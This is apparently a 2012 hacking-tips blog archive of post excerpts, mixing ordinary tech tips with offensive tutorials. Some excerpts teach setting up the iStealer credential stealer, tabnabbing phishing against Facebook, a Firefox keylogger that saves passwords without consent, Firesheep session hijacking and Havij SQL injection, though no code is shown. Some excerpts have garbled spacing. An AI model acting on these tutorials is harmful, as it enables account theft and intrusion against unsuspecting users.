Posts

Showing posts from 2012

iStealer Tutorial

Image
Before we start, I just wanted to say this, This is tutorial for people which have no knowledge on configuring a iStealer server! If you have no knowledge on how to configure a iStealer server please read on!! Also before we start we need to sign up for a free FTP service, I currently use http://www.drivehq.com so use that one, sign up and now lets start! Step 1 ( Obtaining iStealer ): Go to the following link: *Note: This file was uploaded by me, it is safe, If you don't believe me nor want to download it search for it on google. I have been using this for a while so I consider it safe. Download Link: http://adf.ly/7rdCS This application WILL be detected by your anti-virus. Of course online scanners detect it as infected.. it's a stealer you know..if you still believe this to be infected by me please do not download! Step 2: (Extracting) Right Click and extract "iStealer 3.0" Once extracted there should be two files. One folder called "Icon Pack" and one a

How to hack Facebook Account ? | Tabnabbing.

Image
My intension of posting an article on such a title is not to harm anyone nor bring down the reputation of the concern services or promote black hat rather I want to aware the users of such a threat they can encounter and for educational purposes. I recommend readers if they abide by the blog's Disclaimer then they can proceed reading this post otherwise leave this page immediately. Facebook is one of the most hyped and widely used social networking site these days.So,attackers always look out for profiles where they can post there spam message,advertise etc.So here in this post I will use a phishing technique called as " Tabnabbing " brought out by Aza Raskin .If you are new to it you can follow my earlier post on Tabnabbing.Keeping in mind that you know what is " Phishing " and how it is done so,lets start..... Requirements: 1.One should know how Phishing is carried out if not ( Read here ) 2.Should have a free hosting account(t35.com /110mb.com / yourfreeh

Full Google Hacking

Operators are used to refine the results and to maximize the search value. They are your tools as well as ethical hackers’ weapons Basic Operators: +, -, ~ , ., *, “”, |, OR Advanced Operators: allintext:, allintitle:, allinurl:, bphonebook:, cache:, define:, filetype:, info:, intext:, intitle:, inurl:, link:, phonebook:, related:, rphonebook:, site:, numrange:, daterange Basic Operators !! (+) force inclusion of something common Google ignores common words (where, how, digit, single letters) by default: Example: StarStar Wars Episode +I (-) exclude a search term Example: apple –red (“) use quotes around a search term to search exact phrases: Example: “Robert Masse” Robert masse without “” has the 309,000 results, but “robert masse” only has 927 results. Reduce the 99% irrelevant results Basic Operators (~) search synonym: Example: ~food Return the results about food as well as recipe, nutrition and cooking information ( . ) a single-character wildcard: Example: m.trix Return the resu

Facebook Hacking: Remote File Inclusion Attack

Image
Facebook being the world's largest social networking website has became the major target for the hackers, attackers and other malicious users. Facebook has hired the team world's leading security experts in order for them to improve their website's security. Moreover facebook also pays 500$ to any one who can identify any sort of vulnerability inside facebook.

Google Search Tricks

Image
Well let me tell You what actually google tricks mean. Google tricks/google tips, does not mean hacking google , Using the below Google operators, we can get the desired google result very quickly. Well we can name this as hidden google secrets or Advanced google searching.  

Increase your RAM and so system speed

1). Start any application, say Word . Open some large documents. 2). Press CTRL+SHIFT+ESC to open Windows Task Manager and click Processes tab and sort the list in descending order on Mem Usage . You will notice that WINWORD.EXE will be somewhere at the top, using multiple MBs of memory.   3). Now switch to Word and simply minimize it. (Don't use the Minimize All Windows option of the task bar).

Latest Airtel Hack

Now a days Airtel gives New option to the Subscriber to access Mobile Office daily @ Rs.25.00/- per day. But this is too Costly. Only 24 hours and the cost is Rs.25.00 Oh GOD!! But I got a Trick that’s help me to Activate my Mobile Office whole 30 days only for 25.00/. Its really good. Just follow the Trick-

Rapidshare Hack

There are two hacks to beat Rapidshare download limits and waiting time. 1) Rapidshare Hack (For Firefox Users) :- The hot new Firefox plug-in takes browser customization to a whole new level by letting users filter site content or change page behaviors. The glory of open-source software is that it allows anyone with the inclination and the scripting knowledge to get under the hood and hot-rod their computing environment. But most of the time, that advantage is available only to people with the programming skills to make the changes they want.

Hack Firefox-Make it Auto Save and Hack all Account ID and Password In Collage

Image
I am going tell you how to make Mozila Firefox Browser as auto save by which when a person Enter any ID and password then it automatic save without any information to Logger. It also save website address by which when you watch then you directly go to website(like FB,orkut,gmail) and Enter ID ,Password and Hack the person's account.

Running Multiple Instances of Google Talk

Users of Google Talk (GTalk) can also let GTalk go to polygamy, that\92s running multiple instances of Google Talk and login to multiple Google accounts on Google Talk. The polygamy trick can be do ne without any crack, patch or hack, with just a simple command li ne parameter or switch /nomutex appended to the Google Talk shortcut. Ability to polygamy running multiple Google Talk is useful if users have multiple Google Talk accounts (or Google or Gmail accounts that used to login to GTalk) or multiple profiles or personalities, and don\92t want to log on and off from o ne account to another account every time when want to switch, or want to log in to all accounts at the same time on the same computer.

Run Firefox inside Firefox

Image
How to run Firefox inside Firefox.? Yup you can run Firefox inside firefox just by typing following url. How about Opening Firefox inside Firefox which is again in another Firefox..? Not bad huh? And its really easy too just type in this url in Firefox's address bar and there you go! Firefox inside Firefox!

Facebook Hack – View photo albums of non-friends

Image
A new facebook exploit allows anyone to access any photo album of non-friends as long as you have the link.

Tips And Tricks To Protect Yourself From Phishing

Phishing is a variant of “ fishing ”.It is used to bait the users to give out their sensitive information such as credit card information,net banking username and passwords and other important personal and financial information.Now a days social networking sites like facebook and orkut are highly targeted sites.These attacks are mainly carried by using Emails,Instant messaging or phone calls.Phishing is a example of social engineering to fool users.In Phishing people are convinced to enter their information in spoofed sites.

Beware Of Tab Napping: New Phishing Technique

I have recently wrote a post on all the techniques of phishing and how to detect these phishing techniques.You can read the post on phishing techniques by clicking here .As people were becoming more and more aware of these traditional phishing techniques and it was becoming difficult for the scammers to cheat people using these phishing techniques so they invented a new technique called “Tab Napping”.This is one of the most intelligent and wise methods of phishing and it not easily detected by a normal internet user until and unless he is aware of this phishing technique.

What Is Adware And How Does It Work

Adwares are the advertisements that popup in your computer screen in .These are different from viruses and malwares becuase most of the times it is installed with the user’s consent.If an adware is installed on your computer it will provide monetary gains to the publisher moreover these adware can automatically install keyloggers or other harmful softwares without the consent of the user which can send credit card details or other private information.

How to Query Google Results Via Sms

SMS’s are one of the most preferred mode of communication among people.Usually people believe that Internet is the only way to get google results.Recently Google has launched a new service that gives you  access to Movie show times ,Locations of local businesses ,Word meanings ,weather forecast ,Product prices and much more.

Basics And Working of SQL Injection Attacks

Image
Basic Introduction To SQL Injection SQl injection is a vulnerability that allows an attacker to influence the queries that are passed to the back-end database.It has been present since the time databases have been attached to the web applications.However, the main credit of bringing SQL injection into public notice goes to Rain Forest Puppy who in 1998 wrote an article on it and in 2000 he wrote another article describing how he hacked one of the popular website on the internet using SQL injection. Before understanding the how SQL injection attacks we need to understand the Simple  Three Tier Architecture or a  Four Tier Architecture. This will clear your basics and give you a rough idea of how database-driven web applications work.

Trick To Lock Your Computer With Usb:PREDATOR

Image
Security of laptops and notebooks have been evolving with new technologies like fingerprint readers,eye scanners,face recognition etc but what about the personal computers? Using this trick you will be able to lock your computer with a Usb.The computer will work only when the Usb is plugged in.Once the Usb is removed keyboard and mouse will automatically get disabled and your screen will get dark.Moreover your computer will get automatically locked.To unlock the computer you will need to insert the Usb again. This trick will work on on all versions of windows including both windows 32 bit and 64 bit Here is the Trick to lock Your Computer With Usb Using Predator

How to Password Protect USB Ports

Image
Sometimes we want to Password Protect our USB ports so that no one can insert or transfer data from/to PC via USB drive. This can be very useful if you have confidental data in your system and don’t want it to share with anyone. MyUSBOnly is third party software which can disable and Password Protect your USB ports. If you want more security you can use USB Predator to lock your computer .

Trick to Get New Google Bar

Image
Following on the footsteps of  Facebook, Google is also making changes in all its services like Google+ , Gmail new interface , Youtube etc.Now it’s the time to say goodbye to decade old black top bar of Google.Google has announced on its blog that it will be replaced by a new a dropdown menu on left side.Google is busy rolling out this change but it will take some time to implement it for all users.If you are curious and want to get it before others follow steps of this trick.

Bypass Firewall At School,College Or Office With UtraSurf

Image
Is Orkut,Facebook,Yahoo blocked on your school,college or office?Then,dont worry I have a solution for you that will not only unblock all the websites that have been blocked  but also make your internet surfing anonymous so that nobody can trace your orignal ip address.As you know that most of the proxy websites are blocked with your school,college or office firewall and even if you find some new proxies they even them block them out.So,why not to move something that is almost a permanent solution. We will be using a very small and free software called ultrasurf.It will not only allow you to surf blocked websites but it will also give you freedom to stream videos,download and upload files. Now Here is the step by step tutorial with screenshots on Trick Bypass Firewall At School,College Or Office With  UtraSurf

Trick On How To Hide Text In Images (Steganography)

Image
It is widely claimed that the trick of hiding text into images (Steganography) has been used by Al Qaeda for communication for carrying out 911 attacks.Well if you also want such a strong security in your communication so that nobody else can interpret your messages except the desired person then we have a free solution for you. By using this trick your text will get hidden into any image of your choice without increasing its size or without reducing its quality.Your data will be encrypted in the image with RC_4 encryption plus SHA hashing.So ,there is no need to worry that it can be easily cracked by anybody.

How to Send Password Protected Email Messages

Image
If you have to send some confidental information like credit card numbers,Bank details etc it may not be secure to send it without any encryption and password protection.Hackers can use sniffers to intercept your email messages or they can retrieve the data after hacking email accounts.To protect yourself from such situations you can use Lockibin which provides password protection and AES-256 bit encryption to your emails.

How to Easily Search Videos on YouTube

Image
As per the latest statistics of youtube 48 hours of videos are uploaded each minute.Now,you can imagine the number of videos that are available on youtube .It is the third most visited website on internet according to alexa ranking. Youtube has its search algorthim that gives relevant results most of the time.But like Gmail and Google it has also its own search operators that increases your search relevancy to much higher levels than a normal search. Also Read: How to Easy Search in Gmail How to Search Videos on You Tube Easily: Search You Tube channel: If you want to search a video on a particular channel of a YouTube then add a word channel with your query separated by comma. See this example: Royal wedding, channel Force YouTube to include a term by using “+” sign Sometimes youtube drops some of your words during search.You can force youtube to include those words by prceding the word with “ + ” sign. Search High-Quality Videos: If you want only High Quality search res

Google Hack For Making Special Advanced Search

Google is considered as the Big Daddy of Internet.Most of the people prefer using google over other search engines like Yahoo,askjeeves,Bing etc due the highly relevant results of google.Now what to do when even google is not providing you with what you want..certainly you will feel that you have reached the end and there is no way that you can get the type of result you want.But wait Dont loose your hope because now we will be telling you some google hacks that will help you get your desired result.You will find these hacks very useful in your day to day life and you can also amuse your friends by telling these google hacks and certainly they will be amazed by knowledge. Now Here Are The List Of Google Hacks With Their Usability Type these searches in google

Tricks to Easily Search in Gmail

As our Gmail is flooded up with lot of emails everyday it gets too laborious to search for a particular mail. Even-though there is a search option in gmail but even it can give you hundred of mails in results and scanning all of them isn’t convenient.You can reduce the results to marginally low levels by using special operators which increases the accuracy of your search.This is quite similar to the advanced operators used in Google Search .

Difference Between Virus,Worms,Trojan and Spyware

We all have heard the terms Virus,Worms,trojans and spyware but only a few of us know the difference between them.We genreally consider everything that is detected by an antivirus as virus but this is not the case.The antivirus not only provides protection against viruses but it also protects us from trojans,worms and spywares.All these can be harmful to your computer hardware and software.Today I will differentiate all these terms from each other . Ok lets start from the introduction of viruses

Tips And Tricks for Protection Against Keyloggers

Ke y loggers also known as ke y Stroke recorders are the softwares that can record the ke y strokes.These are Used in phishing websites to steal y our username and password.These ke y logger can also be installed on a computer and the y can send usernames and passwords using y our Internet connection. Y ou can protect y ourself using special tips and tricks.And if y ou follow the guidelines we are providing y our username and password will be safe even if a ke y logger has been alread y installed on y our s y stem.Here are the tips and tricks to protect y ourself from the ke y loggers

What is WEP Encryption and its Security

WEP encryption  (Wired Equivalent Privacy, or  Wired Equivalent Privacy) is a cipher, implemented in the 802.11 wireless connection protocol, which encrypts the information we will pass between two points so that it can only be access to them and interpret them the points that have the same key. In general, a wireless router or Access Point will only allow access to those terminals that have the same WEP encryption key.

Tips And Tricks On How To Secure Wifi Connection

Wifi st a nds for  Wireless Fidelity. Most of the people rush through while setting up their wifi connection without thinking a bout the security of their wifi connection.It is quite underst a nd a ble th a t they w a nt to connect to Internet as quickly as possible a nd Moreover securing a wifi network is a bit tricky for most of the people so they give up their hopes quite e a rly a nd le a ve their wifi network unsecured.Their a re sever a l loopholes through which you r unsecured wireless connection c a n be e as ily h a cked.So ,In this post you will know how to secure you r wifi network with simple steps.

Trick to Decrypt Passwords Stored in Firefox With FirePasswordViewer

Image
We usually store the username and passwords of the websites that we access regularly into Firefox to skip the need of entering the username and password over and again.Firefox stores the username and password for websites by user’s permission.These username and passwords are stored in an encrypted manner into Firefox sign-on database . But this can be very harmful to you if somebody access your computer as these passwords can be decrypted easily.So,your accounts may get hacked.I will also show you the method to protect yourself from getting hacked .This trick works on all operating systems like windows xp,vista and windows 7.It also supports all Firefox browser versions. Here is a step by step tutorial with screenshots on  Trick to Decrypt Passwords Stored in Firefox With FirePasswordViewer

Firesheep:Trick to Hack Facebook and Twitter Password on Wifi

Image
Do you access your Facebook or Twitter account while you are on a public network like your college’s or office’s unsecured wifi.Then this is the time that you should think about your account security.If you think that facebook or Twitter are secured websites then it’s the time to face the reality they are not secured.Whenever you login into your facebook or twiiter account check the address bar of your browser you will see something like http://www.facebook.com/home.php? Similar is the case with twitter.They use http protocol instead of secured https protocol.But if you login into your gmail account you will notice that it uses https protocol. So, the trick I am telling you works only on websites like facebook,twiiter,flickr but not on secured websites like Gmail.So here is Trick to Hack Facebook and Twitter Password on Wifi and also the method of protection from this hack.This trick doesnot require any programming knowlege and everyone can use this trick easily.

Trick To Make Free Call to Any Number In World with movibox

Well this is not any hac k of mobile services but instead a legitimate way of ma k ing a free call to any number in world.This can be a real helpful if you do not have any account balance in your mobile and you need to ma k e a urgent call.This is the right time movibox can help you out. So  what you will get with this service. You will get free calling time of 5 minutes and you can call with it  anywhere in world to any mobile number.To ma k e a call clic k on Direct call Button after you register a account with them. Can you Ma k e unlimited calls? One of my friends suggested me a tric k to ma k e unlimited calls using this service. What’s the Tric k ? Well the tric k is quite simple one..He suggested me to ma k e multiple email accounts so that I can register on movibox multiple times.This tric k wor k ed for me around 5 to 6 times and I thin k they have figured out this method and Now my account gets automatically bloc k ed when I create a new account.

Trick To Use Multiple Email ID’s From Single Gmail Account

You may call this as a hack or a trick or a bug in gmail.If you have a gmail ID then you can create and use multiple email ID’s with the single gmail ID .So, there is no need to create different email accounts for registering multiple times on a single website.Suppose ,I want to create two accounts on abc.com then I have to use different email id’s for each account but with this method I will be able to register on any site multiple times with single email account.I have tested this trick on gmail account but have not tried it on Yahoo or Hotmail .So the Requirement for this trick to work is

Trick for Advanced SQL Injection : Havij

Image
I got a tremendous response for my earlier post on SQL injection .A lot of people request for advanced SQL injection tutorial.Before I give you a complete layout of how to do Advanced Sql injection on vulnerable website I recommend you to go through the earlier post so get a slight idea about What Sql injection Is And How It Works. Well to make the Sql injection easier for you I would be using a tool Havij.Its has both a free version and and a paid version.In this tutorial I will be demonstrating how to use the free version of Havij.The success rate for this tool is more then 94% on the vulnerable website. It is automated tool for SQL injection for penetration testers to check whether a website is vulnerable to SQL injection or not.All you need to do is to enter the URL of the site that you want to test for the vulnerability and click on ANALYZE button.It will automatically scan the website for Sql Injection.

Basics And Working of SQL Injection Attacks

Image
Basic Introduction To SQL Injection SQl injection is a vulnerability that allows an attacker to influence the queries that are passed to the back-end database.It has been present since the time databases have been attached to the web applications.However, the main credit of bringing SQL injection into public notice goes to Rain Forest Puppy who in 1998 wrote an article on it and in 2000 he wrote another article describing how he hacked one of the popular website on the internet using SQL injection.

Tool to Check Username Availability on More than 80 Websites

Image
With wide explosion in the reach-ability of Internet, the numbers of user has increased exponentially and so the number of websites.If you are an Internet freak and has been already registered on popular website you might know how difficult it is to find a common username for all websites.You can find usernamea  available in one website but on another it may be already taken.This results in remembering different usernames for different websites ( or in making of a spreadsheet to keep record ). Now you can troubleshoot this problem by checking availability of  username on most popular 80 websites simultaneously.

Download Google Chrome Extension to Check Adsense Earnings

Image
A lot of adsense publishers tend to check their earning multiple times a day. Adsense Publisher Toolbar  is  an extension for Google Chrome, which once installed  fits in near Url Adress bar  and you can your check earnings by a mouse hover over the Adsense Publisher Toolbar icon. I am not sure why  toolbar  is included in its name as there are no options to customize any settings, only login ability has been embedded in this extension. Using this extension you can check the current day, previous day, current month and the previous month earnings . It also shows the earnings from top channels of your Adsense account and Life Time revenue data. Now you can check your earnings from any tab and without the need of logging over and again in your account.

Trick To Recover Files From Megaupload.com

Image
Lot of people create online back up of their files by uploading files on the various free file sharing websites like Megaupload, Mediafire, 4Shared and many more. Megaupload was one of the leading file sharing website which is recently Shut Down by the FBI because this organization appeared to do copyright infringement. To protest against the seizure of Megaupload Anonymous attacked FBI website and shut it down within few minutes. When you upload any file on a  file sharing website due to popularity it also gets shared on other multiple file sharing websites. As the Megaupload is not working now and if you want to recover your file which you had uploaded on megaupload website then here is the step by step tutorial.

Google Hack For Making Special Advanced Search

Google is considered as the Big Daddy of Internet.Most of the people prefer using google over o the r search engines like Yahoo,askjeeves,Bing etc due the highly relevant results of google.Now what to do when even google is not providing you with what you want..certainly you will feel that you have reached the end and the re is no way that you can get the type of result you want.But wait Dont loose your hope because now we will be telling you some google hacks that will help you get your desired result.You will find the se hacks very useful in your day to day life and you can also amuse your friends by telling the se google hacks and certainly the y will be amazed by knowledge.

How To Restart and Shutdown Windows 8: NPower Tray

Image
Microsoft has heated up the market with the launch of Windows 8. Windows 8 has comes with new Metro User Interface which is especially developed for tablet phones. Microsoft has completely overhauled the look of  interface and along with Metro UI there are lot of new Features. Some features and menu options are also hidden in Windows 8,  unlike in older versions of windows there were Shut Down and Restart options right at start menu window. But there is no direct option to Shut Down and Restart in Windows 8. However there are multiple ways to accomplish Shutdown and Restart windows 8 with third party tools as well as from Windows 8 itself.

How to Create a VPN Connection for Free

Image
VPN ( Virtual Private Network ) is a technology used to create secure connections in a public network like Internet.It often requires a username and password to connect to  a VPN.The data transferred in VPN is encrypted and the connected computers acts as if they are on same secure, local area network.Now you can connect to VPN for free and surf Internet securely.

Do You Really Want That New 3G Connection?

This is a guest post by Kelly Jones . If you wish to write one kindly check out the  guidelines  to write a guest post. Nowadays having a 3G connection on your mobile is the latest fad. Whether you use it or not is a different story altogether. 3G allows you fast speed internet access but there is a catch. The huge bills that are caused by expensive data plans and data consumption that can spiral out of control due to you being always connected on the internet, which can be pretty heady and become a habit. If you only need intermittent access to the net and emails, then even the older GPRS / EDGE connection will suffice as it is considerably cheaper. So how do we decide whether to shift to 3G or not. Some points to ponder over:

How to Install Windows 7 on MacBook Pro Using Boot Camp

Image
Looking for ways to dual boot your MAC Os with Windows. Luckily Apple has released Boot Camp utility that  lets you install Windows OS along with Mactnitosh on your Macbook Pro.This will provide you the flexibilty to run Windows and Mac Softwares on single machine. Boot Camp works with  EFI  ( Extensible Firmware Interface ). EFI is software interface between the operating system and the firmware which is best for replacement of older  BIOS. After Dual boot whenever you will start your Macbook you will have the option to either start Mac or Windows.

How To Block a Website For Specific Time Period in Windows:FocalFilter

Image
Website is a collection of interconnected webpages containing content like audio, video, text, images, songs, movies etc. A webpage is a document written in a plain text intermixed with format of Hypertext Mark Up language(HTML).Webpages of the Website can usually be retrieved from a simple Uniform Resource Locator(URL)known as Web address. Website is stored on the webserver known as HTTP server. There are too many reason to block websites, one and the most common reason is that parents want to prevent their children from accessing harmful websites such as porn or to prevent them from spending their precious time on Social Networking Websites. Another reason is to prevent access to restricted content like hacking,youtube etc for specific time.

Trick To Block Any Website On Your Computer

Image
If you want to block certain websites on your computer without any software then this trick can  be very helpful to you.You can block any number of websites and if blocked they cannot be opened in any browser like google chrome,firefox,opera and Internet explorer . For this trick we will edit the host file of the windows and will use the Ip address 127.0.0.1 ( i.e localhost) . Whenever somebody will try to open the blocked website the user will be redirected to local host.This trick works in windows xp,vista and windows 7 Here is the  Trick To Block Any Website On Your Computer

Indepth Guide for Cloud Computing,its Working,Advantages and Disadvantages

Image
World is moving fast and now everyone is migrating their data online for better safety and quick access. Cloud Computing is a new computing service through which users can access shared resources, software and information over a network. Cloud Computing is a general term that delivers hosted services on the internet. It is a new technology where no installation of applications is required and users can access the files on any computer with internet access. Yahoo, Gmail, Google Docs etc are the best real time examples of Cloud Computing where you don’t have to install any application on your system or server. Cloud Computing provides computation, data access, data management, storage resources to users and they can use it without having any knowledge of cloud infrastructure.

Best Software To Hide Ip Address:Hide My Ip

Image
Recently I have been testing various softwares for hiding Ip address.My experience is not very good one.Most of the softwares that I have tested were not able to provide the level of anonymity that I wanted and there were also compatibility issues with different browser and most of them made my internet connection to slow down.Some of You might be wandering that why I am bothered about hiding my Ip address. What Is The Need For Hiding Ip Address? Whenever you connect to Internet your computer is assigned a unique IP address which can be used to Trace your Location,your identity.Many websites record your ip address to create a online profile as you surf the Internet.They keep record of the websites you visited,Products you purchase over Internet and other sensitive data.Moreover hacker’s are always there to track your Ip address and intrude into your computer.

Tricks to Bypass Pandora Radio U.S IP Restriction

P and ora is popular music streaming we bsite which is currently available only in United States.It automatically creates a personalized radio based on your previous song selections and plays similar songs .To select the songs it uses Genome Project, which analyses music through factors such as tone, speed, instruments and styles.It also changes its song selection depending upon the ratings given to songs played earlier.

How to Reset Windows 7 or Vista Password

Image
If somehow you have forgotten your windows password and are looking for way around to login back into your computer then you won’t have to worry.There are many methods are available for resetting password of your windows 7 or vista.But many of them are lengthy or sophisticated.This is one of the simplest method and you only need a windows installation CD/USB to reset the password.It relies on an unpatched bug in windows operating system.

Hack Administrator Password In Windows 7,Xp And Vista

Image
Most of us might have experienced a situation when we forget our Windows administrator password.And we are not able to login into windows and access our all necessary data and programs.At that time the only solution that comes into or mind is the installation of fresh copy of windows but this will lead to loss of all data and files that are in the windows drive.There is also another way around using which you don’t need to install a fresh copy of windows and without losing any data.We are providing here the method to reset windows administrator password.This tutorial is only for the purpose of recovering your windows 7,xp or vista password.This should be used only when you forgot or lost your password  and not for hacking into somebody else’s system.Using this hack  you can reset your administrator password or leave it blank.

Trick on How to Convert Firefox into keylogger

Do you want create your own working undectable keylogger and without any programming knowledge.The keylogger can store all the usernames and passwords of mozilla firefox without the user’s consent. How this Keylogger Works? Whenever you login into any website using mozilla firefox browser it always ask’s you whether you want to Save password or not for that website. We will be using a script that will not give the user option to save the password instead it will automatically save the passwords without user’s consent and we will retrieve them later. Can this be detected by antivirus? I have scanned it with Mcafee,Norton and Avast and it is totally undetectable. Does It work on all websites? It is working on almost all websites like facebook,hotmail,reddit and digg.But this trick somehow failed on Gmail. Now I will give you the step by step tutorial on how to use this trick

Trick to Decrypt Passwords Stored in Firefox With FirePasswordViewer

Image
We usu a lly s to re the usern a me a nd p a sswords of the websites th a t we a ccess regul a rly in to  Firefox  to skip the need of entering the usern a me a nd p a ssword over a nd a g a in.Firefox s to res the usern a me a nd p a ssword for websites by user’s permission.These usern a me a nd p a sswords  a re s to red in a n encrypted m a nner in to  Firefox sign-on d a t a b a se . But this  c a n be very h a rmful to you if somebody a ccess your computer a s these p a sswords c a n be decrypted e a sily.So,your a ccounts m a y get h a cked.I will a lso show you the method to protect yourself from getting h a cked . This trick works on a ll oper a ting systems like windows xp,vist a a nd windows 7.It a lso supports  a ll Firefox browser versions. Here is a step by step tu to ri a l with screenshots on  Trick to Decrypt P a sswords S to red in Firefox With FireP a sswordViewer

DreamHost Hacked,Time To Reset Passwords

Dreamhost one of the popular hosting website has fallen prey to hackers.They have issued a mass Password reset notice to protect the users.According to a post published on Dreamhost official blog, it was detected that security breach occurred in November 2011 through their one click Install wizard. Here is the official Statement from their blog Apparently, the breach occurred in November via the one-click install wizard offered by Dreamhost: One click and your whole WordPress / Drupal web site is installed, ready to use, automatically updated by the wizard. Apparently, it’s the wizard itself that was compromised and anybody who used it was affected.

Data Privacy Day: Top 10 Ways to Secure your Data

This is a guest post by Greg Buckskin . If you wish to write one kindly check out the  guidelines  to write a guest post. There’s no denying it, 2011 was the biggest year  for security breaches. If you haven’t taken steps to secure your personal and professional data, consider Data Privacy Day (Jan 28th) as a belated New Year’s resolution. Even if you think of yourself as completely secure already, chances are that you’ll find yourself lacking on at least one or two of the following 10 ways to safeguard your information.